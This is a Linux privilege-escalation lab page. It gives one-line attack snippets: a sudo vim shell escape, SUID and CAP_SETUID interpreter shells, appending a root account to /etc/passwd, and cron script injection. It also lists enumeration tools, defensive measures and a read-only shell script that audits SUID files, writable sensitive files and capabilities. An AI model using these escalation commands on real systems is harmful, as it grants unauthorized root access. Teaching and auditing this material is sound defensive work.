🛡️ Authorized Lab Environment: All demos run against safe, isolated lab targets. Includes defensive takeaways and security best practices. Educational only.

⬆️ Access Control Audit Lab

Permission Analysis - Linux Lab

5 different methods to escalate privileges on a Linux system

Sudo Misconfiguration
    sudo vim -c ':!/bin/bash'
    GTFOBins shell escape via allowed sudo commands

SUID Binary
    python3 -c 'os.execl("/bin/bash")'
    Abuse SUID bit on interpreters

Writable /etc/passwd
    echo 'hacker:hash:0:0:::'
    Add root user to passwd file

Cron Job Abuse
    echo 'payload' >> cron.sh
    Inject commands into writable cron scripts

Linux Capabilities
    perl -e 'setuid(0); exec bash'
    Exploit CAP_SETUID capability

🛠️ Enumeration Tools

LinPEAS: Comprehensive Linux enumeration
LinEnum: Legacy enumeration script
linux-exploit-suggester: Kernel exploit finder
pspy: Monitor processes without root
GTFOBins: Unix binaries exploitation database
PEASS-ng: Privilege Escalation Awesome Scripts

🛡️ Defense Strategies

Principle of Least Privilege: Only grant necessary permissions
Audit Sudo Rules: Review /etc/sudoers regularly
Remove SUID Bits: chmod u-s unnecessary binaries
File Permissions: Proper ownership on sensitive files
Cron Security: Restrict script permissions to root only
Capability Audit: Review with getcap -r /
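
A read-only audit covering the SUID, file-permission, cron and capability items in the list above, as an added example that is not part of the original page. The function names and the root-directory argument (which lets it run against a constructed fixture tree as well as "/") are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page). Function names are this
# example's own. Nothing here changes the system; it only lists findings.

# Set-uid regular files: review each one, then chmod u-s what is not needed.
suid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Files writable by group or others among the paths given.
loose_writable() {
    find "$@" -type f \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Account and sudo policy files must never be group/other writable.
sensitive_writable() {
    loose_writable "$1/etc/passwd" "$1/etc/shadow" "$1/etc/sudoers"
}

# Anything cron executes must be writable by its owner only.
cron_writable() {
    loose_writable "$1/etc/crontab" "$1/etc/cron.d" "$1/etc/cron.daily" \
                   "$1/etc/cron.hourly" "$1/var/spool/cron"
}

# Full report. SUID files are listed for review; loose write bits on
# sensitive or cron files are failures and make audit return 1.
audit() {
    root=${1:-/}
    rc=0
    suid_files "$root" | sed 's|^|REVIEW suid: |'
    for check in sensitive_writable cron_writable; do
        out=$("$check" "$root")
        [ -n "$out" ] || continue
        rc=1
        printf '%s\n' "$out" | sed "s|^|FAIL $check: |"
    done
    # File capabilities, only if getcap is installed on this host.
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "$root" 2>/dev/null | sed 's|^|REVIEW capability: |'
    fi
    return "$rc"
}
```

Source the file and call `audit /` as root on the host being reviewed; every REVIEW line needs a documented reason to stay, and every FAIL line needs its write bits removed.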

Master Linux Privilege Escalation

Learn to identify and exploit misconfigurations to gain root access in CTF and real-world scenarios
